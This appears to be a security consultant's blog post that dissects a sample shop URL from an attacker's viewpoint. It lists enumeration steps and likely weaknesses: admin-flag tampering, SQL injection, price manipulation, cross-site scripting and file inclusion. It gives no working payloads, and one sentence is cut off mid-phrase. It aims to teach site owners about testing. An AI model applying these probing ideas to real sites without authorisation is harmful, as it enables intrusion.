URL from an Attackers View

Attackers View of a URL

URLAttackView

As a user who cares what happens in a URL ?

... not me.(most of the time).

But let's break down opportunities for an attacker to learn something or even compromise via opportunities within a URL

http://www.niceguyeddy_.com/secure/store.php?isadmin=0&discount=0.00&msg=%3c%62%3e%53%61%6c%65%21%3c%2f%62%3e&itemID=31337&getPage=sold.php

  • http:// This is a plain text protocol and offers no privacy and no integrity - simply put, it’s only useful for loading resources that have no impact on your security

  • www. Subdomain records can be enumerated to identify new servers and services

  • niceguyeddy_.com the primary element in the domain name, from this we can enumerate a wealth of knowledge

  • /secure/: folder(s) obviously we started with http as the protocol this folder is NOT secure, but we can run tools agains the domain to enumerate all or as many folders as we have time to do

  • store.php: We now know it’s using PHP (Personal Home Page) this means we can discard any other technology from our library of techniques and vulnerabilities

  • Parameters: Parameters are passed to the web application mostly to satisfy settings criteria or user specific search results ?isadmin=0: this could be vulnerable to manipulation, an attacker might change this to a 1 to see if it impacts the way the site behaves - (is he admin) additionally an opportunity for SQL injection &discount=0.00: well, what would happen if those numbers where positive and also if they where negative ? something an attacker or AppSec tester would think about &msg=: that funny looking code you see is actually ‘encoded’ text we encode text so that parsers can handle special characters if we take the content from msg and URL Decode it we can see it says “<b>Sale!</b>” and that is HTML this would be vulnerable to Cross Site Scripting and potentially other vulnerabilities getPage: this is ‘getting a page’ that suggests that it’s loading a file from the servers web folder, an attacker would be interested in path traversal,local file inclusion and remote file inclusion it could also be vulnerable to


Considerations

This is just one request, a GET Request there is in theory a lot more than discussed but this is really just about getting you (the reader) thinking about security, Hackers and Security testers will take full advantage of any weakness and rinse it as much as possible, if you are responsible for any web applications or Web facing interfaces ... just make sure you have been tested, really tested. not just your developers giving it the thumbs up, they are full time developers, we are full-time hackers/security consultants